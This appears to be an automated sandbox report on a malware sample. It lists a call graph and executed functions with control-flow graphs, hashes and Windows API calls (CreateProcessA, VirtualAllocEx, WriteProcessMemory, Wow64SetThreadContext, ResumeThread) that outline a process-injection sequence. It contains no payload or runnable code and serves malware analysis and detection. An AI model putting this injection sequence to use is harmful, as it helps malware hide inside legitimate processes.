19257->19273 19258 7d06c8e 19258->19153 19259->19258 19260->19258 19261->19258 19262->19258 19263->19258 19264->19258 19265->19258 19266->19258 19267->19258 19268->19258 19269->19258 19270->19258 19271->19258 19272->19258 19273->19258 19275 7d07136 19274->19275 19276 7d07abb 19275->19276 19354 7d05b43 19275->19354 19358 7d05b48 19275->19358 19280 7d07964 19279->19280 19281 7d07987 19280->19281 19362 7d05c33 19280->19362 19366 7d05c38 19280->19366 19285 7d076ca 19284->19285 19370 7d054c3 19285->19370 19374 7d054c8 19285->19374 19286 7d07a8f 19290 7d0724f 19289->19290 19291 7d076ef 19290->19291 19378 7d05a88 19290->19378 19382 7d05a83 19290->19382 19291->19162 19292 7d0775e 19292->19291 19295 7d05b43 WriteProcessMemory 19292->19295 19296 7d05b48 WriteProcessMemory 19292->19296 19295->19291 19296->19291 19298 7d0785b 19297->19298 19300 7d054c3 ResumeThread 19298->19300 19301 7d054c8 ResumeThread 19298->19301 19299 7d07a8f 19300->19299 19301->19299 19303 7d076dd 19302->19303 19304 7d071a9 19302->19304 19386 7d05573 19303->19386 19390 7d05578 19303->19390 19306 7d054c3 ResumeThread 19304->19306 19307 7d054c8 ResumeThread 19304->19307 19305 7d07a8f 19306->19305 19307->19305 19311 7d07075 19310->19311 19394 7d05dd0 19311->19394 19398 7d05dc4 19311->19398 19317 7d05b43 WriteProcessMemory 19315->19317 19318 7d05b48 WriteProcessMemory 19315->19318 19316 7d0739e 19317->19316 19318->19316 19320 7d07076 19319->19320 19322 7d05dd0 CreateProcessA 19320->19322 19323 7d05dc4 CreateProcessA 19320->19323 19321 7d0710b 19322->19321 19323->19321 19325 7d07237 19324->19325 19327 7d05c33 ReadProcessMemory 19325->19327 19328 7d05c38 ReadProcessMemory 19325->19328 19326 7d07987 19327->19326 19328->19326 19330 7d07136 19329->19330 19331 7d07abb 19330->19331 19332 7d05b43 WriteProcessMemory 19330->19332 19333 7d05b48 WriteProcessMemory 19330->19333 19332->19330 19333->19330 19335 7d0774d 19334->19335 19337 7d05b43 WriteProcessMemory 19335->19337 19338 7d05b48 WriteProcessMemory 19335->19338 19336 7d076ef 19336->19162 19337->19336 19338->19336 19341 7d07136 19339->19341 19340 7d07abb 19341->19162 19341->19340 19342 7d05b43 WriteProcessMemory 19341->19342 19343 7d05b48 WriteProcessMemory 19341->19343 19342->19341 19343->19341 19345 7d075cc 19344->19345 19347 7d05573 Wow64SetThreadContext 19345->19347 19348 7d05578 Wow64SetThreadContext 19345->19348 19346 7d075e7 19346->19162 19347->19346 19348->19346 19350 7d071a9 19349->19350 19352 7d054c3 ResumeThread 19350->19352 19353 7d054c8 ResumeThread 19350->19353 19351 7d07a8f 19352->19351 19353->19351 19355 7d05b46 WriteProcessMemory 19354->19355 19357 7d05be7 19355->19357 19357->19275 19359 7d05b76 WriteProcessMemory 19358->19359 19361 7d05be7 19359->19361 19361->19275 19363 7d05c38 ReadProcessMemory 19362->19363 19365 7d05cc7 19363->19365 19365->19281 19367 7d05c83 ReadProcessMemory 19366->19367 19369 7d05cc7 19367->19369 19369->19281 19371 7d054c8 ResumeThread 19370->19371 19373 7d05539 19371->19373 19373->19286 19375 7d05508 ResumeThread 19374->19375 19377 7d05539 19375->19377 19377->19286 19379 7d05ac8 VirtualAllocEx 19378->19379 19381 7d05b05 19379->19381 19381->19292 19383 7d05a88 VirtualAllocEx 19382->19383 19385 7d05b05 19383->19385 19385->19292 19387 7d05578 Wow64SetThreadContext 19386->19387 19389 7d05605 19387->19389 19389->19304 19391 7d055bd Wow64SetThreadContext 19390->19391 19393 7d05605 19391->19393 19393->19304 19395 7d05e59 CreateProcessA 19394->19395 19397 7d0601b 19395->19397 19399 7d05dd0 CreateProcessA 19398->19399 19401 7d0601b 19399->19401 19141 7d07f98 19142 7d08123 19141->19142 19143 7d07fbe 19141->19143 19143->19142 19145 7d0483c 19143->19145 19146 7d08218 PostMessageW 19145->19146 19147 7d08284 19146->19147 19147->19143 19402 161f658 19403 161f69e GetCurrentProcess 19402->19403 19405 161f6f0 GetCurrentThread 19403->19405 19406 161f6e9 19403->19406 19407 161f726 19405->19407 19408 161f72d GetCurrentProcess 19405->19408 19406->19405 19407->19408 19409 161f763 GetCurrentThreadId 19408->19409 19411 161f7bc 19409->19411 19412 1616dd8 19413 1616de1 19412->19413 19414 1616e19 19413->19414 19416 1616e50 19413->19416 19417 1616e7a 19416->19417 19418 1616ed1 19417->19418 19419 1616e50 CreateActCtxA 19417->19419 19421 1616fc9 19417->19421 19418->19413 19419->19417 19422 1616fed 19421->19422 19426 16174d1 19422->19426 19430 16174e0 19422->19430 19428 16174e0 19426->19428 19427 16175e4 19427->19427 19428->19427 19434 161632c 19428->19434 19432 1617507 19430->19432 19431 16175e4 19431->19431 19432->19431 19433 161632c CreateActCtxA 19432->19433 19433->19431 19435 1618570 CreateActCtxA 19434->19435 19437 1618633 19435->19437

                                                                                                                                            Executed Functions

                                                                                                                                            Function 07D08888 Relevance: .4, Instructions: 361COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b395f6e04337bc8e46e20c11f8eea7475b893b3ed90b3b3b3b8d2550b88dcea3
                                                                                                                                            • Instruction ID: c57cb236de41b9927b9a3a30204048de487ec631a0f8018a1e9ca27f59bd6ab8
                                                                                                                                            • Opcode Fuzzy Hash: b395f6e04337bc8e46e20c11f8eea7475b893b3ed90b3b3b3b8d2550b88dcea3
                                                                                                                                            • Instruction Fuzzy Hash: B0D1BBB17017118FDB15EB79C8607AEBBF7AF89200F18486DD1868B2D5CB35E841C7A5
                                                                                                                                            Function 07D00007 Relevance: .1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a8a392b4e844efdd5364e241fc43ac472b2ef8a6eef6b5942baa9154bcaa5bc
                                                                                                                                            • Instruction ID: 0bbe17d0879f42ccdf186367b3a262d1f6d96721ee917087c4f2488228ac7f8d
                                                                                                                                            • Opcode Fuzzy Hash: 7a8a392b4e844efdd5364e241fc43ac472b2ef8a6eef6b5942baa9154bcaa5bc
                                                                                                                                            • Instruction Fuzzy Hash: 0F3118B0D057599FDB15CFAAC8443DDBFB2AF8A310F04C0AAD008AB295DB744845CBA1
                                                                                                                                            Function 07D00040 Relevance: .1, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d6c70c770206cf9f7aa892fedda4f0600f61f507845534bd54403d630c284b6e
                                                                                                                                            • Instruction ID: af027be33a2a3e49a754cdf2f5e5217f7ebacc0a2bca2183984b82e65f7ebde1
                                                                                                                                            • Opcode Fuzzy Hash: d6c70c770206cf9f7aa892fedda4f0600f61f507845534bd54403d630c284b6e
                                                                                                                                            • Instruction Fuzzy Hash: A231B1B0D046189BEB18CF9AC9487DEFAF6BF89300F14D06AD409B6294DB744946CFA0
                                                                                                                                            Function 0161F658 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 304 161f658-161f6e7 GetCurrentProcess 308 161f6f0-161f724 GetCurrentThread 304->308 309 161f6e9-161f6ef 304->309 310 161f726-161f72c 308->310 311 161f72d-161f761 GetCurrentProcess 308->311 309->308 310->311 313 161f763-161f769 311->313 314 161f76a-161f782 311->314 313->314 317 161f78b-161f7ba GetCurrentThreadId 314->317 318 161f7c3-161f825 317->318 319 161f7bc-161f7c2 317->319 319->318
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0161F6D6
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0161F713
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0161F750
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0161F7A9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: e5bab5a63ea0d053193f6340085daccd94cc8a87570043f2ace001bf166d306c
                                                                                                                                            • Instruction ID: 2679548cc3afbbe594b314d9f150181bb05bb53253b8b8e351d3df0a49884d25
                                                                                                                                            • Opcode Fuzzy Hash: e5bab5a63ea0d053193f6340085daccd94cc8a87570043f2ace001bf166d306c
                                                                                                                                            • Instruction Fuzzy Hash: E05158B09006098FDB04DFAAE948BAEBBF1FF48304F24C059D419A7360D734A984CF65
                                                                                                                                            Function 07D05DC4 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 371 7d05dc4-7d05e65 374 7d05e67-7d05e71 371->374 375 7d05e9e-7d05ebe 371->375 374->375 376 7d05e73-7d05e75 374->376 380 7d05ec0-7d05eca 375->380 381 7d05ef7-7d05f26 375->381 378 7d05e77-7d05e81 376->378 379 7d05e98-7d05e9b 376->379 382 7d05e83 378->382 383 7d05e85-7d05e94 378->383 379->375 380->381 384 7d05ecc-7d05ece 380->384 391 7d05f28-7d05f32 381->391 392 7d05f5f-7d06019 CreateProcessA 381->392 382->383 383->383 385 7d05e96 383->385 386 7d05ed0-7d05eda 384->386 387 7d05ef1-7d05ef4 384->387 385->379 389 7d05edc 386->389 390 7d05ede-7d05eed 386->390 387->381 389->390 390->390 393 7d05eef 390->393 391->392 394 7d05f34-7d05f36 391->394 403 7d06022-7d060a8 392->403 404 7d0601b-7d06021 392->404 393->387 395 7d05f38-7d05f42 394->395 396 7d05f59-7d05f5c 394->396 398 7d05f44 395->398 399 7d05f46-7d05f55 395->399 396->392 398->399 399->399 400 7d05f57 399->400 400->396 414 7d060b8-7d060bc 403->414 415 7d060aa-7d060ae 403->415 404->403 417 7d060cc-7d060d0 414->417 418 7d060be-7d060c2 414->418 415->414 416 7d060b0 415->416 416->414 419 7d060e0-7d060e4 417->419 420 7d060d2-7d060d6 417->420 418->417 421 7d060c4 418->421 423 7d060f6-7d060fd 419->423 424 7d060e6-7d060ec 419->424 420->419 422 7d060d8 420->422 421->417 422->419 425 7d06114 423->425 426 7d060ff-7d0610e 423->426 424->423 428 7d06115 425->428 426->425 428->428
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D06006
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: 6b9448fa7c3f1e353c926f02ca6f5b0dad549e8d676fad4e0f82dd592a39b60c
                                                                                                                                            • Instruction ID: 46b8d30022f26524db52c48b6babe3abd5560298dc608e59b53683a493c2d403
                                                                                                                                            • Opcode Fuzzy Hash: 6b9448fa7c3f1e353c926f02ca6f5b0dad549e8d676fad4e0f82dd592a39b60c
                                                                                                                                            • Instruction Fuzzy Hash: 61A15EB1D0021ADFDB10CF68D841BEDFBB2BF44314F1481AAE849A7290DB749995CF92
                                                                                                                                            Function 07D05DD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 429 7d05dd0-7d05e65 431 7d05e67-7d05e71 429->431 432 7d05e9e-7d05ebe 429->432 431->432 433 7d05e73-7d05e75 431->433 437 7d05ec0-7d05eca 432->437 438 7d05ef7-7d05f26 432->438 435 7d05e77-7d05e81 433->435 436 7d05e98-7d05e9b 433->436 439 7d05e83 435->439 440 7d05e85-7d05e94 435->440 436->432 437->438 441 7d05ecc-7d05ece 437->441 448 7d05f28-7d05f32 438->448 449 7d05f5f-7d06019 CreateProcessA 438->449 439->440 440->440 442 7d05e96 440->442 443 7d05ed0-7d05eda 441->443 444 7d05ef1-7d05ef4 441->444 442->436 446 7d05edc 443->446 447 7d05ede-7d05eed 443->447 444->438 446->447 447->447 450 7d05eef 447->450 448->449 451 7d05f34-7d05f36 448->451 460 7d06022-7d060a8 449->460 461 7d0601b-7d06021 449->461 450->444 452 7d05f38-7d05f42 451->452 453 7d05f59-7d05f5c 451->453 455 7d05f44 452->455 456 7d05f46-7d05f55 452->456 453->449 455->456 456->456 457 7d05f57 456->457 457->453 471 7d060b8-7d060bc 460->471 472 7d060aa-7d060ae 460->472 461->460 474 7d060cc-7d060d0 471->474 475 7d060be-7d060c2 471->475 472->471 473 7d060b0 472->473 473->471 476 7d060e0-7d060e4 474->476 477 7d060d2-7d060d6 474->477 475->474 478 7d060c4 475->478 480 7d060f6-7d060fd 476->480 481 7d060e6-7d060ec 476->481 477->476 479 7d060d8 477->479 478->474 479->476 482 7d06114 480->482 483 7d060ff-7d0610e 480->483 481->480 485 7d06115 482->485 483->482 485->485
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D06006
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: 29997c3965bdc168701a6e427a9dca73e6b776a96c4c8a764f7688be50b3bb12
                                                                                                                                            • Instruction ID: 43c51bc08f35ff4f6ee746f1cffe1b68b670172b1ec556f74128d88e51c2a0bf
                                                                                                                                            • Opcode Fuzzy Hash: 29997c3965bdc168701a6e427a9dca73e6b776a96c4c8a764f7688be50b3bb12
                                                                                                                                            • Instruction Fuzzy Hash: E0914DB1D0021ADFDB14CF68C841BEDFBB2BF48310F1481A9E859A7290DB749995CF92
                                                                                                                                            Function 0161632C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 486 161632c-1618631 CreateActCtxA 489 1618633-1618639 486->489 490 161863a-1618694 486->490 489->490 497 16186a3-16186a7 490->497 498 1618696-1618699 490->498 499 16186a9-16186b5 497->499 500 16186b8 497->500 498->497 499->500
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 01618621
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 7abecf67fabc8281c206b026224a14bb28142777ba18c4626bff2ebccbdb7991
                                                                                                                                            • Instruction ID: 46122853d461e461f6e754c7a5ebfdf6dcd377898379ec5e7d3f88d2d2676de6
                                                                                                                                            • Opcode Fuzzy Hash: 7abecf67fabc8281c206b026224a14bb28142777ba18c4626bff2ebccbdb7991
                                                                                                                                            • Instruction Fuzzy Hash: CD41D2B0C00719CFDB24DFAAC944B9DBBF5BF45304F24845AD408AB255DB756985CF90
                                                                                                                                            Function 07D05B43 Relevance: 1.6, APIs: 1, Instructions: 81injectionCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 502 7d05b43-7d05b44 503 7d05b76-7d05b96 502->503 504 7d05b46-7d05b74 502->504 509 7d05ba6-7d05be5 WriteProcessMemory 503->509 510 7d05b98-7d05ba4 503->510 504->503 512 7d05be7-7d05bed 509->512 513 7d05bee-7d05c1e 509->513 510->509 512->513
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D05BD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: 4b7fd1eeb94ac3193ec729e49692810300a451b0b75c298425722908626d791e
                                                                                                                                            • Instruction ID: 7c27b2ed00a855e03374f960a252898bef548894928927fa04f64698b62a138e
                                                                                                                                            • Opcode Fuzzy Hash: 4b7fd1eeb94ac3193ec729e49692810300a451b0b75c298425722908626d791e
                                                                                                                                            • Instruction Fuzzy Hash: B33158B58003499FCB10DFA9D845BEEBFF0FB48320F10852AE959A7291D778A554CBA0
                                                                                                                                            Function 07D05B48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 517 7d05b48-7d05b96 522 7d05ba6-7d05be5 WriteProcessMemory 517->522 523 7d05b98-7d05ba4 517->523 525 7d05be7-7d05bed 522->525 526 7d05bee-7d05c1e 522->526 523->522 525->526
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D05BD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: bcb5b08ed0964c8530a0961b65cdae453ca3fb8980138695185def58daeb8cf9
                                                                                                                                            • Instruction ID: e510993c90988c643290a26e4e1e544b4d017d0bcdccbd8ac1ce073059daab85
                                                                                                                                            • Opcode Fuzzy Hash: bcb5b08ed0964c8530a0961b65cdae453ca3fb8980138695185def58daeb8cf9
                                                                                                                                            • Instruction Fuzzy Hash: 5D2155B19003199FCB10DFA9C885BDEBBF5FF48310F10842AE959A7250C778A954CFA4
                                                                                                                                            Function 07D05573 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 530 7d05573-7d055c3 533 7d055d3-7d05603 Wow64SetThreadContext 530->533 534 7d055c5-7d055d1 530->534 536 7d05605-7d0560b 533->536 537 7d0560c-7d0563c 533->537 534->533 536->537
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D055F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: 091754064ab49f26c8bf9547ea043b8c7ffaa9e0821b317076bf1b965a48516b
                                                                                                                                            • Instruction ID: d439a45d62a470f01b12fbca5d070e67508d9ccf54b367794216fb65563d93cc
                                                                                                                                            • Opcode Fuzzy Hash: 091754064ab49f26c8bf9547ea043b8c7ffaa9e0821b317076bf1b965a48516b
                                                                                                                                            • Instruction Fuzzy Hash: 482139B19003498FDB10DFAAC445BEEFFF4AF48324F54842AD859A7241CB789944CFA5
                                                                                                                                            Function 07D05C33 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 541 7d05c33-7d05cc5 ReadProcessMemory 545 7d05cc7-7d05ccd 541->545 546 7d05cce-7d05cfe 541->546 545->546
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D05CB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: f54b84896ccdeb80f5d87abbd9f6429b37e984eb6f4f4a1d604c524354c128c2
                                                                                                                                            • Instruction ID: c5018e8a680b4370e7926170f81e968be1b4cda25654d4dba41a5b96b33ed765
                                                                                                                                            • Opcode Fuzzy Hash: f54b84896ccdeb80f5d87abbd9f6429b37e984eb6f4f4a1d604c524354c128c2
                                                                                                                                            • Instruction Fuzzy Hash: 412136B18003599FCB10DFAAC841BEEFBF5FF48320F10842AE959A7250C7349954CBA5
                                                                                                                                            Function 07D05578 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 550 7d05578-7d055c3 552 7d055d3-7d05603 Wow64SetThreadContext 550->552 553 7d055c5-7d055d1 550->553 555 7d05605-7d0560b 552->555 556 7d0560c-7d0563c 552->556 553->552 555->556
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D055F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: 5f5129a832d1362cd6a3ac4f6614b126f0c5ef18660759856e788ff27c3b5e02
                                                                                                                                            • Instruction ID: 8a53159ae335bf1e71b15dcd675ea00ae93bf62cddf2e4cecb1e25c7a9007014
                                                                                                                                            • Opcode Fuzzy Hash: 5f5129a832d1362cd6a3ac4f6614b126f0c5ef18660759856e788ff27c3b5e02
                                                                                                                                            • Instruction Fuzzy Hash: 992138B1D002098FDB10DFAAC485BEEFBF4EF48324F50842AD459A7240CB789944CFA5
                                                                                                                                            Function 07D05C38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 560 7d05c38-7d05cc5 ReadProcessMemory 563 7d05cc7-7d05ccd 560->563 564 7d05cce-7d05cfe 560->564 563->564
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D05CB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: a7e72bec90ac7061b774a50795d939b2e7085ca1cc622b6132dae7f306d87787
                                                                                                                                            • Instruction ID: 722a7fe180b1bc9b14f8f0b28886e188f056bfbc8b975e21c1e14eddb4b14c3c
                                                                                                                                            • Opcode Fuzzy Hash: a7e72bec90ac7061b774a50795d939b2e7085ca1cc622b6132dae7f306d87787
                                                                                                                                            • Instruction Fuzzy Hash: 692116B18002599FCB10DFAAC945ADEFBF5FF48310F10842AE959A7250C7349554CBA4
                                                                                                                                            Function 0161F8A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 568 161f8a0-161f934 DuplicateHandle 569 161f936-161f93c 568->569 570 161f93d-161f95a 568->570 569->570
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0161F927
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 3403bd9c4fa79d3344bc9b9883ab8dbb01da1b6a279105ea13ae529ff6b22108
                                                                                                                                            • Instruction ID: 17a15efdc66af7d5ed12fc6f57f8a9faa13d0dc0c08de6249b796313c2bc172f
                                                                                                                                            • Opcode Fuzzy Hash: 3403bd9c4fa79d3344bc9b9883ab8dbb01da1b6a279105ea13ae529ff6b22108
                                                                                                                                            • Instruction Fuzzy Hash: 1B21E4B5900208AFDB10DFAAD984ADEBFF5FB48310F14841AE958A3310C374A944CFA4
                                                                                                                                            Function 07D05A83 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 573 7d05a83-7d05b03 VirtualAllocEx 577 7d05b05-7d05b0b 573->577 578 7d05b0c-7d05b31 573->578 577->578
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D05AF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 6fdfa000a14131f913662812e398f09c1e464308f141e7ae9bc85eb64c6547d7
                                                                                                                                            • Instruction ID: daa80cddde1a4b6a3809f26cc96f5b2dc9a300f03be060eb3919197e2d49e371
